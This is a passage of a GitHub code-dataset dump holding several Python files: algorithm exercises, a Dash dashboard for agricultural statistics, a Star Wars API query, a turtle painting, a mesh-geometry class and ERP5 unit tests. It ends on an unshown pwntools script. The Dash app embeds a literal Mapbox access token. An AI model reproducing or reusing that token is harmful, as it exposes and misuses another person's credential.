1].\n\n\ndef twoSum(arr, target):\n \"\"\"\n If the target = x+y or y = target-x,\n If target = 1, and if we know x is 2, then y has to be -1 or (y = 1-2)\n if we know x is -3, then y has to be 4 or (y = 1-(-3)), ...\n In a dict, for every x we have seen, we store what y we are looking for i.e y = index of x.\n As we loop through, if we find that y in the array, we are done and we return index of x and index of y\n \"\"\"\n look_for = {}\n for i, x in enumerate( arr ):\n try:\n print('Find:', look_for[x], i)\n return look_for[x], i\n except KeyError:\n look_for.setdefault(target - x, i)\n\n\n\nprint(twoSum([2, 7, -1, 15, 1], 3))\n","repo_name":"manmax31/Algorithms","sub_path":"two-sum.py","file_name":"two-sum.py","file_ext":"py","file_size_in_byte":1024,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"35910358693","text":"# Import required libraries\nimport pickle\nimport copy\nimport pathlib\nimport dash\nimport dash_table\nimport math\nimport datetime as dt\nimport pandas as pd\nfrom dash.dependencies import Input, Output, State, ClientsideFunction\nimport dash_core_components as dcc\nimport dash_html_components as html\nimport plotly.graph_objs as go\nimport io\nimport xlsxwriter\nimport flask\nfrom flask import send_file\nimport urllib\n\n\n# get relative data folder\nPATH = pathlib.Path(__file__).parent\n\napp = dash.Dash(\n __name__,\n)\n\nserver = app.server\n\n# Create global chart template\nmapbox_access_token = \"pk.eyJ1IjoiamFja2x1byIsImEiOiJjajNlcnh3MzEwMHZtMzNueGw3NWw5ZXF5In0.fk8k06T96Ml9CLGgKmk81w\"\n\n# Load data\ndf = pd.ExcelFile(PATH.joinpath(\"(4.21)Database for China Agricultural.xlsx\"))\nsheet_to_df_map = {}\navailable_indicators = []\n\nfor sheet_name in df.sheet_names:\n sheet_to_df_map[sheet_name] = df.parse(sheet_name)\n available_indicators.append(df.parse(sheet_name).columns[0])\n\ndef trim(df):\n trim_df = df.drop([df.index[-1]])\n trim_df = trim_df.set_index('Unnamed: 0')\n years = trim_df.columns.values\n\n trim_df_T = trim_df.transpose()\n\n info = {}\n years_options_list = []\n for i in years:\n try:\n info['label'] = int(i)\n except:\n info['label'] = i\n info['value'] = i\n years_options_list.append(info)\n info = {}\n return years, trim_df, trim_df_T, years_options_list\n\n\ndef trim2(df):\n trim_df = df.drop([df.index[-1]])\n trim_df = trim_df.set_index('Year')\n\n trim_df_T = trim_df.transpose()\n years = trim_df_T.columns.values\n\n info = {}\n years_options_list = []\n for i in years:\n if i <= 2100:\n try:\n info['label'] = int(i)\n except:\n info['label'] = i\n info['value'] = i\n years_options_list.append(info)\n info = {}\n return years, trim_df, trim_df_T, years_options_list\n\n\ndef trim3(df):\n trim_df = df.drop([df.index[-1]])\n trim_df = trim_df.drop([df.index[0]])\n trim_df = trim_df.set_index('Year')\n\n trim_df_T = trim_df.transpose()\n years = trim_df_T.columns.values\n\n info = {}\n years_options_list = []\n for i in years:\n if i <= 2100:\n try:\n info['label'] = int(i)\n except:\n info['label'] = i\n info['value'] = i\n years_options_list.append(info)\n info = {}\n return years, trim_df, trim_df_T, years_options_list\n\ninfo = {}\ntable_options_list = []\nfor i in range(len(available_indicators)):\n info['label'] = str(available_indicators[i].split(\":\")[1].replace(\"\\n\",\"\").replace(\"\\xa0\",\"\").replace(\"\\\\\",\" \" ))\n info['value'] = str(df.sheet_names[i])\n table_options_list.append(info)\n info = {}\n\n# for double headers\ntable_list1 = ['3.1.1a', '3.1.1b', '3.2.2', '3.2.4', '3.3.1', '3.3.2a',\n '3.3.2b', '3.3.2c', '3.3.2d', '3.3.2e', '3.4.2', ' 3.4.9', '3.4.11', ' 3.4.13', ' 3.4.16', '3.4.20']\n\n# for triple headers\ntable_list2 = [' 3.4.22', ' 3.5.1a', ' 3.5.1b', ' 3.5.2', '3. 4.5b']\n\n######################################### MAIN APP #########################################\ndef generate_control_card():\n \"\"\"\n :return: A Div containing controls for graphs.\n \"\"\"\n return html.Div(\n id=\"control-card\",\n style={'margin': '10px'}, \n\n children=[\n html.Div([\n html.Div([\n html.H6('This is the Control panel of the database, you can qeury data you want here',id='des'),\n html.H6('Select country here',id='country-selector-text'),\n dcc.Dropdown(\n id='country-selector',\n options=[{'label': 'China', 'value': 'China'},{'label': 'Indonesia', 'value': 'Indonesia'}],\n value='China'\n ), \n ],\n ), \n ], className =\"row\"\n ),\n html.Div([\n html.Div([\n html.H6('Select table here',id='table-selector-text'),\n dcc.Dropdown(\n id='table-selector',\n options=table_options_list,\n value='3.1.1a'\n ), \n ],\n ), \n ], className =\"row\"\n ),\n\n html.Div(\n style={'padding-left': '20px'},\n children=[\n html.H6('Select year here',id='year-selector-text'),\n dcc.Dropdown(\n id='year-selector',\n style={'display': 'none'}\n ), \n html.Br(),\n # Export data\n html.Div(\n style={\"textAlign\": \"right\", \"padding-bottom\": \"20px\"},\n children=[\n\n html.A(html.Button('Export Data', id='download-button',\n style={\n \"background-color\": \"#0074e4\", \"color\": \"white\"},\n # style= {\"border-color\": \"#17a2b8\"},\n className=\"button\"),\n id='download-link', download=\"rawdata.csv\", href=\"\", target=\"_blank\")\n ]),\n ],\n ), \n ], className=\"row\"\n )\n\napp.layout = html.Div([\n html.Div(id=\"app-container\", children=[\n # Banner\n html.Div([html.H2(\n 'Database for Agriculture',\n id='title'\n ),\n ], style={\"textAlign\": \"left\"},\n className=\"banner\"\n ),\n\n # Left column\n html.Div([\n html.Div(\n # id=\"left-column\",\n children=[generate_control_card()],\n style={\"textAlign\": \"center\"}\n ), \n ], className = \"pretty_container four columns\"\n ),\n\n # datatable\n html.Div([ \n html.Div(\n [\n html.Div([\n dash_table.DataTable(\n id='table',\n style_table={'overflowX': 'auto',\n 'overflowY': 'auto',\n 'height': '400px',\n },\n style_cell={\n 'fontSize': 12,\n 'font-family': 'sans-serif',\n 'textAlign': 'left'\n },\n style_header={\n 'backgroundColor': 'white',\n 'fontWeight': 'bold'\n },\n sort_action='native',\n ),\n ], className = \"pretty_container one-third columns\"),\n ], className = \"row flex-display\"),\n ],\n ),\n\n\n html.Div([\n html.Div([\n dcc.Graph(\n id='pie-chart'\n )\n ], className = 'pretty_container one-third columns'),\n ]),\n\n html.Div([\n html.H6('Try clicking on the legend to isolate one trace of data',id='click'),\n ], className = 'pretty_container one-third columns'),\n\n html.Div([\n dcc.Graph(\n id='bar-chart'\n )\n ], className = \"pretty_container one-third columns\"),\n # bottom graph\n\n html.Div([\n dcc.Graph(\n id='line-chart'\n )\n ], className = \"pretty_container one-third columns\"),\n ]),\n])\n\n######################################### UPDATING FIGURES #########################################\n# callback for display year-selector or not\n@app.callback([Output('year-selector', 'style'), Output('year-selector', 'options')], [Input('table-selector', 'value')])\ndef update_years_option(selected_table):\n if selected_table in table_list1:\n selected_df = pd.read_excel(PATH.joinpath(\n \"(4.21)Database for China Agricultural.xlsx\"), sheet_name=selected_table, header=2)\n selected_df = selected_df.fillna(9999)\n years, trim_selected_df, trim_selected_df_T, years_options_list = trim(\n selected_df)\n\n elif selected_table in table_list2:\n selected_df = pd.read_excel(PATH.joinpath(\n \"(4.21)Database for China Agricultural.xlsx\"), sheet_name=selected_table, header=1)\n selected_df = selected_df.fillna(9999)\n years, trim_selected_df_T, trim_selected_df, years_options_list = trim3(\n selected_df)\n\n else:\n selected_df = pd.read_excel(PATH.joinpath(\n \"(4.21)Database for China Agricultural.xlsx\"), sheet_name=selected_table, header=1)\n selected_df = selected_df.fillna(9999)\n years, trim_selected_df_T, trim_selected_df, years_options_list = trim2(\n selected_df)\n\n return {'display': 'block'}, years_options_list\n\n@app.callback(Output('year-selector', 'value'), [Input('year-selector', 'options')])\ndef set_years_value(available_options):\n return available_options[0]['value']\n\n# callback for datatable\n@app.callback([Output('table', 'data'), Output('table', 'columns')], [Input('table-selector', 'value')])\ndef updateTable(selected_table):\n if selected_table in table_list1:\n selected_df = pd.read_excel(PATH.joinpath(\n \"(4.21)Database for China Agricultural.xlsx\"), sheet_name=selected_table, header=2)\n\n elif selected_table in table_list2:\n selected_df = pd.read_excel(PATH.joinpath(\n \"(4.21)Database for China Agricultural.xlsx\"), sheet_name=selected_table, header=1)\n years, trim_selected_df_T, trim_selected_df, years_options_list = trim3(\n selected_df)\n\n else:\n selected_df = pd.read_excel(PATH.joinpath(\n \"(4.21)Database for China Agricultural.xlsx\"), sheet_name=selected_table, header=1)\n selected_df = selected_df.drop(selected_df.index[-1])\n dt_col_param = []\n for col in selected_df.columns:\n dt_col_param.append({\"name\": str(col), \"id\": str(col)})\n\n return (selected_df.to_dict('records'), (dt_col_param))\n\n# Callback for csv download\n@app.callback(Output('download-link', 'href'), [Input('table-selector', 'value')])\ndef update_downloader(selected_table):\n selected_df = pd.read_excel(PATH.joinpath(\n \"(4.21)Database for China Agricultural.xlsx\"), sheet_name=selected_table, header=1)\n csvString = selected_df.to_csv(index=False, encoding='utf-8-sig')\n csvString = \"data:text/csv;charset=utf-8-sig,%EF%BB%BF\" + \\\n urllib.parse.quote(csvString)\n return csvString\n\n# callback for pie chart\n@app.callback(Output('pie-chart', 'figure'), [Input('year-selector', 'value'), Input('table-selector', 'value')])\ndef update_pie_chart(selected_year, selected_table):\n\n if selected_table in table_list1:\n selected_df = pd.read_excel(PATH.joinpath(\n \"(4.21)Database for China Agricultural.xlsx\"), sheet_name=selected_table, header=2)\n years, trim_selected_df, trim_selected_df_T, years_options_list = trim(\n selected_df)\n\n else:\n selected_df = pd.read_excel(PATH.joinpath(\n \"(4.21)Database for China Agricultural.xlsx\"), sheet_name=selected_table, header=1)\n years, trim_selected_df_T, trim_selected_df, years_options_list = trim2(\n selected_df)\n\n return {\n 'data': [go.Pie(\n labels=trim_selected_df_T.columns,\n values=trim_selected_df[selected_year].values.tolist(),\n marker={'colors': ['#EF963B', '#C93277', '#349600', '#EF533B', '#57D4F1', '#96D38C']})],\n 'layout': go.Layout(title=dict(text=f\"Yearly result on \"+str(selected_year),x=0.1),\n legend=dict(x=0.5, y=-0.2,\n font=dict(\n family=\"sans-serif\",\n size=10,\n color=\"black\"\n ),\n # bgcolor='LightSteelBlue',\n xanchor='center',\n orientation='h'\n ),\n margin={'l': 0, 'r': 0},\n autosize=True)}\n\n# callback for bar chart\n@app.callback(Output('bar-chart', 'figure'), [Input('table-selector', 'value')])\ndef update_bar_chart(selected_table):\n trace = []\n\n selected_df = pd.read_excel(PATH.joinpath(\n \"(4.21)Database for China Agricultural.xlsx\"), sheet_name=selected_table)\n title = selected_df.columns[0].split(\":\")[1]\n\n if selected_table in table_list1:\n selected_df = pd.read_excel(PATH.joinpath(\n \"(4.21)Database for China Agricultural.xlsx\"), sheet_name=selected_table, header=2)\n years, trim_selected_df, trim_selected_df_T, years_options_list = trim(\n selected_df)\n\n elif selected_table in table_list2:\n selected_df = pd.read_excel(PATH.joinpath(\n \"(4.21)Database for China Agricultural.xlsx\"), sheet_name=selected_table, header=1)\n years, trim_selected_df_T, trim_selected_df, years_options_list = trim3(\n selected_df)\n\n else:\n selected_df = pd.read_excel(PATH.joinpath(\n \"(4.21)Database for China Agricultural.xlsx\"), sheet_name=selected_table, header=1)\n years, trim_selected_df_T, trim_selected_df, years_options_list = trim2(\n selected_df)\n\n for i in range(len(years)):\n years[i] = str(years[i])[:4]\n\n for i in trim_selected_df_T.columns:\n trace.append(\n go.Bar(x=years, y=trim_selected_df_T[i].values.tolist(), name=i,))\n\n return {\n 'data': trace,\n 'layout': go.Layout(title=str(title), hovermode=\"closest\")}\n\n# callback for line chart\n@app.callback(Output('line-chart', 'figure'), [Input('table-selector', 'value')])\ndef update_line_chart(selected_table):\n trace = []\n\n selected_df = pd.read_excel(PATH.joinpath(\n \"(4.21)Database for China Agricultural.xlsx\"), sheet_name=selected_table)\n title = selected_df.columns[0].split(\":\")[1]\n\n if selected_table in table_list1:\n selected_df = pd.read_excel(PATH.joinpath(\n \"(4.21)Database for China Agricultural.xlsx\"), sheet_name=selected_table, header=2)\n years, trim_selected_df, trim_selected_df_T, years_options_list = trim(\n selected_df)\n\n else:\n selected_df = pd.read_excel(PATH.joinpath(\n \"(4.21)Database for China Agricultural.xlsx\"), sheet_name=selected_table, header=1)\n years, trim_selected_df_T, trim_selected_df, years_options_list = trim2(\n selected_df)\n\n for i in range(len(years)):\n years[i] = str(years[i])[:4]\n\n for i in trim_selected_df_T.columns:\n trace.append(go.Scatter(\n x=years, y=trim_selected_df_T[i].values.tolist(), name=i, mode='lines',))\n\n return {\n 'data': trace,\n 'layout': go.Layout(title=str(title), colorway=['#fdae61', '#abd9e9', '#2c7bb6'])\n }\n\nif __name__ == '__main__':\n app.run_server(debug=True)\n","repo_name":"Tony19970430/dash-CSAM","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":15437,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"36289269482","text":"#!/usr/bin/env python3\n\"\"\" Where I am? \"\"\"\nimport requests\n\n\ndef sentientPlanets():\n \"\"\" returns the list of ships that can hold a\n given number of passengers\n\n If no ship available, return an empty list.\n \"\"\"\n\n url = \"https://swapi-api.hbtn.io/api/species/\"\n planets = []\n while url is not None:\n r = requests.get(url)\n results = r.json()[\"results\"]\n for specie in results:\n if (specie[\"designation\"] == \"sentient\" or\n specie[\"classification\"] == \"sentient\"):\n\n planet_url = specie[\"homeworld\"]\n if planet_url is not None:\n p = requests.get(planet_url).json()\n planets.append(p[\"name\"])\n url = r.json()[\"next\"]\n return planets\n","repo_name":"HeimerR/holbertonschool-machine_learning","sub_path":"pipeline/0x01-apis/1-sentience.py","file_name":"1-sentience.py","file_ext":"py","file_size_in_byte":791,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"9197052686","text":"# Day 18 Project: Draw a hirst-painting\nimport turtle as tk\nimport random\n# import colorgram\n#\n# rgb_colors = []\n# # Extracts colors form an image\n# colors = colorgram.extract(\"image.jpg\", 30)\n# # extract the rgb values and add to list\n# for color in colors:\n# r = color.rgb.r\n# g = color.rgb.g\n# b = color.rgb.b\n# new_color = (r, g, b)\n# rgb_colors.append(new_color)\n#\n# # print rgb tuples and copy it into a color_list\n# print(rgb_colors)\ncolor_list = [(241, 229, 79), (193, 10, 71), (208, 158, 97), (110, 179, 206), (163, 171, 33), (23, 118, 174), (162, 72, 35), (214, 137, 169), (30, 136, 73), (7, 35, 85), (234, 70, 40), (120, 182, 137), (239, 221, 4), (213, 83, 129), (80, 19, 80), (11, 58, 36), (238, 161, 190), (180, 44, 88), (10, 44, 127), (7, 102, 62), (120, 39, 23), (20, 168, 199), (6, 86, 97), (146, 208, 217), (161, 210, 186), (95, 38, 22)]\n\ntimmy = tk.Turtle()\ntk.colormode(255)\nscreen = tk.Screen()\ntimmy.penup()\ntimmy.setx(-screen.canvwidth)\ntimmy.sety(-screen.canvheight)\n\n\ndef draw_horizontal():\n for i in range(10):\n timmy.color(random.choice(color_list))\n timmy.pendown()\n timmy.dot(20)\n timmy.penup()\n timmy.forward(50)\n\n\nfor _ in range(5):\n draw_horizontal()\n timmy.left(90)\n timmy.forward(50)\n timmy.left(90)\n\n draw_horizontal()\n timmy.right(90)\n timmy.forward(50)\n timmy.right(90)\n\n\nscreen.exitonclick()\n","repo_name":"at-tawlib/100-days-of-code","sub_path":"day-018/hirst-painting/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1411,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"19490055244","text":"import numpy as np\nimport json\nimport os\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d.art3d import Line3DCollection\nfrom mpl_toolkits import mplot3d\nfrom .utils import ax3d_handle\n\nclass Mesh:\n def __init__(self):\n self.vertices = None # in meter\n self.tri_elements = None\n self.tet_elements = None\n self.fixed_vindex = None\n self.n_v = None\n self.n_tri = None\n self.n_tet = None\n\n self.x = None \n self.xp = None\n self.sp = None\n\n self.surf_vindex = None\n self.tri_line_segs = None\n self.tet_line_segs = None \n\n self.tri_ele = np.array([1,3,2,1,2,4,1,4,3,2,3,4]).reshape(-1,3)-1 #in outer normal vector order \n self.top_vtx = np.array([4,3,2,1])-1\n self.tri_line_comb = np.array([1, 2, 1, 3, 2, 3]).reshape(-1, 2) - 1\n self.tet_line_comb = np.array([1, 2, 1, 3, 1, 4, 2, 3, 2, 4, 3, 4]).reshape(-1, 2) - 1\n \n @staticmethod\n def lame_param(E, v):\n la = E * v / (1 + v) / (1 - 2 * v)\n mu = E / 2 / (1 + v)\n return la, mu\n '''\n basic self.XXX update\n 1. read_mesh_json\n 2. _get_ns\n 3. _handle_tri_elements\n 3.1 _update_tri_elements\n 3.2 _update_tri_tet\n 3.3 _update_tri_normal_vecs\n 3.4 _update_vtx_normal_vecs\n 4. _get_tet_line_segs \n 5. _get_tri_line_segs\n 6. _update_normal_vecs\n 7. update_normal_vecs\n '''\n def read_mesh_json(self, mesh_filename):\n mesh_file = os.path.join(os.path.dirname(os.path.abspath(__file__)),mesh_filename)\n with open(mesh_file, 'r') as file:\n liver_mat = json.load(file)\n for key, value in liver_mat.items():\n exec('self.' + key + '=np.array(value)')\n\n def _get_ns(self):\n self.n_v = self.vertices.shape[0]\n self.n_tri = self.tri_elements.shape[0]\n if self.tet_elements is not None:\n self.n_tet = self.tet_elements.shape[0]\n \n def _update_tri_elements(self):\n # find tri_elements order base on tet_elements \n self.tri_set = self.tet_elements[:,self.tri_ele].reshape(-1,3) # all the triangle, has repeating triangle\n temp = [tuple(row) for row in np.sort(self.tri_set,axis=1)]\n temp2,indices, counts = np.unique(temp,axis=0,return_index=True,return_counts=True)\n self.tri_elements = self.tri_set[indices[np.argwhere(counts==1)]].reshape(-1,3) \n\n def _update_tri_tet(self):\n # find the tri elements relationship to tet elements, [ n_tri x 2 ]\n tri_tet = np.zeros((self.tri_elements.shape[0],3)) \n i = 0\n for tri_ele in self.tri_elements:\n match_tet = np.argwhere((self.tri_set == tuple(tri_ele)).all(axis=1)).squeeze()\n tri_tet[i] = np.r_[match_tet//4,match_tet%4,self.top_vtx[match_tet%4]].astype(int) # ith tet elements, which face in tri_ele order\n i+=1\n self.tri_tet = tri_tet\n \n def _update_tri_normal_vecs(self,vertices):\n # find center points and the normal vector of each triangle element\n tri_vtx = vertices[self.tri_elements]\n self.tri_mid = tri_vtx.mean(axis=1)\n tri_normal_vec = np.cross(tri_vtx[:,1]-tri_vtx[:,0],tri_vtx[:,2]-tri_vtx[:,0])\n self.tri_normal_vec = tri_normal_vec*(1.0/np.linalg.norm(tri_normal_vec,axis=1))[:,np.newaxis] \n\n def _update_vtx_normal_vecs(self):\n # find vertices normal vector as sum of adjacent triangle elements\n if self.surf_vindex is None:\n self.surf_vindex = np.unique(self.tri_elements)\n vtx_normal_vec = [self.tri_normal_vec[\n np.argwhere(self.tri_elements==iv)[:,0]\n ].sum(axis=0) for iv in self.surf_vindex]\n # equal to\n # vtx_normal_vec = np.zeros((self.surf_vindex.size,3))\n # i = 0\n # for iv in self.surf_vindex:\n # iv_tri_index = np.argwhere(self.tri_elements==iv)[:,0]\n # iv_tri_nv = self.tri_normal_vec[iv_tri_index] \n # vtx_normal_vec[i] = iv_tri_nv.sum(axis=0)\n # i+=1\n self.vtx_normal_vec = vtx_normal_vec *(1/np.linalg.norm(vtx_normal_vec,axis=-1))[:,np.newaxis]\n \n def _handle_tri_elements(self,vertices):\n # vertices : self.vertices or self.x\n if self.tet_elements is not None:\n self._update_tri_elements()\n self._update_tri_tet() \n self._update_tri_normal_vecs(vertices)\n self._update_vtx_normal_vecs()\n self._get_ns()\n self._get_tri_line_segs()\n if self.tet_elements is not None:\n self._get_tet_line_segs()\n\n def _get_tet_line_segs(self):\n tet_line_segs = np.zeros((self.tet_line_comb.shape[0], self.n_tet, 2))\n for i in range(self.tet_line_comb.shape[0]): tet_line_segs[i] = self.tet_elements[:, self.tet_line_comb[i]]\n temp = [tuple(row) for row in np.sort(tet_line_segs.reshape(-1, 2), axis=1)]\n self.tet_line_segs = np.unique(temp, axis=0).astype(int)\n \n def _get_tri_line_segs(self):\n tri_line_segs = np.zeros((self.tri_line_comb.shape[0], self.n_tri, 2))\n for i in range(self.tri_line_comb.shape[0]): tri_line_segs[i] = self.tri_elements[:, self.tri_line_comb[i]]\n temp = [tuple(row) for row in np.sort(tri_line_segs.reshape(-1, 2), axis=1)]\n self.tri_line_segs = np.unique(temp, axis=0).astype(int)\n \n def _update_normal_vecs(self,vertices):\n self._update_tri_normal_vecs(vertices)\n self._update_vtx_normal_vecs()\n\n def update_normal_vecs(self):\n self._update_normal_vecs(self.x)\n '''\n plot function section\n \n 7. plt_tri_normal_vec # tri_mid: light purple, nv: dark purple\n 6. _plt_vtx_normal_vec # vtx: light pink, nv: dark pink \n 5. plt_vtx \n 4. plt_x\n 3. _plt_fixed_vtx # vtx: purple\n 2. _plt_ps_normal_vecs # tri_mid: light purple, nv: dark purple\n 1. _plt_msh # tet: blue , tri: green vtx:orange \n '''\n def _plt_ps_normal_vecs(self,base_ps,nvs,cp='#7D75FE',cnv='#1D1788',**kwargs):\n ax = ax3d_handle(**kwargs)\n if len(base_ps.shape) == 1: base_ps = base_ps.reshape(-1,3)\n if len(nvs.shape) == 1: nvs = np.matlib.repmat(nvs,base_ps.shape[0],1)\n ax.scatter(base_ps[:, 0], base_ps[:, 1], base_ps[:, 2], c=cp) \n ax.quiver(base_ps[:, 0], base_ps[:, 1], base_ps[:, 2],\n nvs[:, 0], nvs[:, 1], nvs[:, 2], color=cnv) \n return ax\n\n def plt_tri_normal_vec(self,vtx_scl=1,vec_scl=1,**kwargs):\n ax = ax3d_handle(**kwargs)\n ax = self._plt_ps_normal_vecs(self.tri_mid*vtx_scl,self.tri_normal_vec*vec_scl,\n cp='#7D75FE',cnv='#1D1788',ax=ax) #light purple # dark purple \n return ax\n\n def _plt_vtx_normal_vec(self,vertices,vtx_scl=1,vec_scl=1,**kwargs):\n ax = ax3d_handle(**kwargs)\n ax = self._plt_ps_normal_vecs(vertices*vtx_scl,self.vtx_normal_vec*vec_scl,\n cp='#f57dd7',cnv='#c20091',ax=ax) #light pink # dark pink\n return ax\n \n def _plt_fixed_vtx(self, vertices, fixed_vindex,**kwargs):\n ax = ax3d_handle(**kwargs)\n ax.scatter(vertices[fixed_vindex, 0],\n vertices[fixed_vindex, 1],\n vertices[fixed_vindex, 2], c='#780EB1') #purple\n return ax\n\n def plt_x(self, draw_type='tri', text_opt='off', scl=1, **kwargs):\n ax = self._plt_msh(self.x*scl, draw_type=draw_type, text_opt=text_opt, **kwargs)\n if self.fixed_vindex is not None:\n ax = self._plt_fixed_vtx(self.x*scl,self.fixed_vindex, ax=ax)\n return ax\n\n def plt_vtx(self, draw_type='tri', text_opt='off', scl = 1,**kwargs): \n ax = self._plt_msh(self.vertices*scl, draw_type=draw_type, text_opt=text_opt, **kwargs)\n return ax\n\n def _plt_msh(self, vertices, draw_type='tri', node_opt = 'on', text_opt='off', **kwargs):\n # draw_type = 'all', 'tri', 'tet', 'node'\n # text_opt = 'off', 'on'\n if draw_type == 'all':\n tri_opt = 'on'\n tet_opt = 'on'\n\n elif draw_type == 'tri':\n tri_opt = 'on'\n tet_opt = 'off'\n\n elif draw_type == 'tet':\n tri_opt = 'off'\n tet_opt = 'on'\n\n else:\n tri_opt = 'off'\n tet_opt = 'off'\n\n ax = ax3d_handle(**kwargs)\n ax.set_xlabel('x')\n ax.set_ylabel('y')\n ax.set_zlabel('z')\n\n # draw line\n if tet_opt == 'on': #blue\n if self.tet_line_segs is None:\n self._get_tet_line_segs()\n line_vt = np.hstack((vertices[self.tet_line_segs[:, 0]], vertices[self.tet_line_segs[:, 1]]))\n lc = Line3DCollection(line_vt.reshape(-1, 2, 3), colors='#6784ed')\n ax.add_collection(lc)\n\n if tri_opt == 'on': #green\n if self.tri_line_segs is None:\n self._get_tri_line_segs()\n line_vt = np.hstack((vertices[self.tri_line_segs[:, 0]], vertices[self.tri_line_segs[:, 1]])).copy()\n lc = Line3DCollection(line_vt.reshape(-1, 2, 3), colors='#6EBA58')\n ax.add_collection(lc)\n\n # draw node\n if node_opt == 'on':\n if tri_opt == 'on': #orange\n if self.surf_vindex is None:\n self.surf_vindex = np.unique(self.tri_elements)\n ax.scatter(vertices[self.surf_vindex, 0], vertices[self.surf_vindex, 1], vertices[self.surf_vindex, 2],\n marker='o', c='#eb8c23') \n if text_opt == 'on':\n for i in self.surf_vindex: ax.text(vertices[i, 0], vertices[i, 1], vertices[i, 2], f'{i}')\n else:\n ax.scatter(vertices[:, 0], vertices[:, 1], vertices[:, 2], marker='o', c='#eb8c23')\n if text_opt == 'on':\n for i in range(self.n_v): ax.text(vertices[i, 0], vertices[i, 1], vertices[i, 2], f'{i}')\n return ax\n","repo_name":"Kexin-Wei/Soft-tissue-deformation-in-laparoscopic-surgery-planning-with-DRL","sub_path":"env_pyrep/Mesh.py","file_name":"Mesh.py","file_ext":"py","file_size_in_byte":10003,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"75"} +{"seq_id":"21098185736","text":"# https://open.kattis.com/problems/pyramids\n\n'''\nwrite a program that computes how high a pyramid can be built \ngiven a certain number of blocks of stone.\n\n- side length that is two less than the one below it\n- The top layer always consist of a single block\n\nInput:\n - int n : number of blocks\n\nOutput: \n - int max_h : max height of a pyramid that can be built with at least n blocks.\n'''\n\nn = int(input())\n\nmax_h = 0\n\nside_start = 1\nwhile side_start**2 <= n:\n max_h += 1\n n -= side_start**2\n side_start += 2\n\n\nprint(max_h)","repo_name":"KhoiUna/icpc-practice","sub_path":"building_pyramids.py","file_name":"building_pyramids.py","file_ext":"py","file_size_in_byte":541,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"71227730803","text":"from Products.ERP5Type.tests.ERP5TypeTestCase import ERP5TypeTestCase\nfrom Products.ERP5Type.UnrestrictedMethod import UnrestrictedMethod\n\nclass PortalTypeOfPortalTypeTestCase(ERP5TypeTestCase):\n \"\"\"\n Base class to test Portal Types of other Portal Types\n \"\"\"\n def getBusinessTemplateList(self):\n return ('erp5_core', 'erp5_base', 'erp5_simulation', 'erp5_accounting')\n\n def setUpPropertyOnPortalType(self, portal_type_id, property_name, property_value):\n portal_type = self.portal.portal_types.get(portal_type_id, None)\n portal_type.setProperty(property_name, property_value)\n\n def cleanPropertyOnPortalType(self, portal_type_id, property_name):\n portal_type = self.portal.portal_types.get(portal_type_id, None)\n portal_type.setProperty(property_name, None)\n\n\nclass TestDeliveryTypeInformation(PortalTypeOfPortalTypeTestCase):\n \"\"\"\n Delivery Type is a Base Type on which a list of allowed ledgers is defined.\n This suite checks that its custom features are correctly implemented.\n \"\"\"\n\n def afterSetUp(self):\n self.createLedgerCategory()\n\n @UnrestrictedMethod\n def createLedgerCategory(self):\n portal_categories = self.portal.portal_categories\n ledger = self.portal.portal_categories.get('ledger', None)\n if ledger is None:\n ledger = portal_categories.newContent(portal_type='Base Category',\n id='ledger')\n\n accounting_ledger = ledger.get('accounting', None)\n if accounting_ledger is None:\n accounting_ledger = ledger.newContent(portal_type='Category',\n id='accounting')\n\n if accounting_ledger.get('general', None) is None:\n accounting_ledger.newContent(portal_type='Category', id='general')\n if accounting_ledger.get('detailed', None) is None:\n accounting_ledger.newContent(portal_type='Category', id='detailed')\n\n def testDefaultLedgerIsSetOnObjectIfSetOnPortalType(self):\n \"\"\"\n Sets up a list of ledger on the Accounting Transaction portal type,\n which is a DeliveryTypeInformation, and checks that new Accounting Transactions\n have a default ledger set at their creation\n \"\"\"\n portal_type = \"Accounting Transaction\"\n self.setUpPropertyOnPortalType(\n portal_type,\n \"ledger_list\",\n ['accounting/general', 'accounting/detailed'])\n\n self.assertEqual(self.portal.portal_types.get(portal_type).getDefaultLedger(),\n 'accounting/general')\n\n module = self.portal.getDefaultModule(portal_type)\n accounting_transaction = module.newContent(portal_type=portal_type)\n\n self.assertEqual(accounting_transaction.hasLedger(), True)\n self.assertEqual(accounting_transaction.getLedgerList(),\n ['accounting/general'])\n\n def testDefaultLedgerIsNotSetOnObjectIfNotSetOnPortalType(self):\n \"\"\"\n If no ledger is defined on the portal type, then it means the\n \"allowed ledger list\" feature is not in use in this instance\n \"\"\"\n portal_type = \"Accounting Transaction\"\n\n portal_type_object = self.portal.portal_types.get(portal_type)\n self.cleanPropertyOnPortalType(portal_type, 'ledger')\n # No ledger should be set on the portal type\n self.assertEqual(portal_type_object.getLedgerList(), [])\n\n module = self.portal.getDefaultModule(portal_type)\n accounting_transaction = module.newContent(portal_type=portal_type)\n\n self.assertEqual(accounting_transaction.getLedgerList(), [])\n\n def testDefaultLedgerIsOverwrittenByNewContentParameter(self):\n \"\"\"\n If a Delivery is created with a given ledger, then it should overwrite\n the default ledger\n \"\"\"\n portal_type = \"Accounting Transaction\"\n self.setUpPropertyOnPortalType(\n portal_type,\n \"ledger_list\",\n ['accounting/general', 'accounting/detailed'])\n\n self.assertEqual(self.portal.portal_types.get(portal_type).getDefaultLedger(),\n 'accounting/general')\n\n module = self.portal.getDefaultModule(portal_type)\n accounting_transaction = module.newContent(portal_type=portal_type,\n ledger='accounting/detailed')\n\n self.assertEqual(accounting_transaction.hasLedger(), True)\n self.assertEqual(accounting_transaction.getLedgerList(),\n ['accounting/detailed'])\n","repo_name":"Nexedi/erp5","sub_path":"bt5/erp5_accounting/TestTemplateItem/portal_components/test.erp5.testTypeDefinition.py","file_name":"test.erp5.testTypeDefinition.py","file_ext":"py","file_size_in_byte":4307,"program_lang":"python","lang":"en","doc_type":"code","stars":171,"dataset":"github-code","pt":"75"} +{"seq_id":"14414993644","text":"from pwn import *\n\ndef getCheck(iden):\n 